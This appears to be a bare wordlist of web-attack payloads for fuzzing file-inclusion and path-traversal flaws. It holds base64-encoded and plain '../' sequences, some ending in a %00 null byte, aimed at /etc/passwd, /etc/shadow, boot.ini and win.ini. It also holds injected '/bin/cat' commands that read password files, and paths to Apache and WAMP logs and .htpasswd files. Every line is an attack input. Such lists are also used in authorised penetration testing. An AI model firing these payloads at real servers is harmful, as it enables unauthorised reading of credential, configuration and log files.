Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
\..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\WINDOWS\win.ini
\..\WINDOWS\win.ini
\\'/bin/cat%20/etc/passwd\\'
\\'/bin/cat%20/etc/shadow\\'
c:/wamp/logs/access.log
c:WINDOWS/system32/
c:\AppServ\MySQL
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\inetpub\wwwroot\index.asp
c:\wamp\logs\access.log
member/.htpasswd
members/.htpasswd
